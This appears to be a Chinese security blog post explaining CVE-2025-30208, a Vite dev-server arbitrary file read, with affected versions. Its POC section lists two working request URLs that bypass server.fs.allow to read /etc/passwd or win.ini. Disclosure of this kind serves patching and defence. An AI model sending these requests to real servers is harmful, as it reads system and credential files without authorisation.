首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2025-30208|Vite任意文件读取漏洞(POC)

CVE-2025-30208|Vite任意文件读取漏洞(POC)

作者头像
信安百科
发布2025-07-30 14:45:28
发布2025-07-30 14:45:28
26000
代码可运行
举报
文章被收录于专栏:信安百科信安百科
运行总次数:0
代码可运行

0x00 前言

Vite 是一个现代化的前端构建工具,旨在通过利用现代浏览器的原生 ES 模块支持,提供快速的开发体验。广泛应用于Vue.js等项目的开发中。在其开发服务器模式下,Vite提供了@fs机制,用于访问服务允许范围内的文件。

Vite 由两部分组成:

1、开发服务器:基于原生 ES 模块,提供超快的热更新。

2、构建命令:使用 Rollup 打包代码,生成适用于生产环境的优化静态资源。

0x01 漏洞描述

Vite 的@fs机制本用于限制对非白名单目录的访问,但其在 URL 解析时未正确处理?raw???import&raw??等查询参数,导致安全检查被绕过。

例如,攻击者可构造类似/@fs/etc/passwd?raw??的请求,导致攻击者可绕过 server.fs.allow 限制,直接读取任意文件内容。

0x02 CVE编号

CVE-2025-30208

0x03 影响版本

代码语言:javascript
代码运行次数:0
运行
复制
6.2.0 <= vite < 6.2.3
6.1.0 <= vite < 6.1.2
6.0.0 <= vite < 6.0.12
5.0.0 <= vite < 5.4.15
vite < 4.5.10

0x04 漏洞详情

POC:

代码语言:javascript
代码运行次数:0
运行
复制
Linux:
 
"http://x.x.x.x/@fs/etc/passwd?raw??"
代码语言:javascript
代码运行次数:0
运行
复制
Windows:

"http://x.x.x.x/@fs/C:/Windows/win.ini?raw??"

0x05 参考链接

https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-03-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档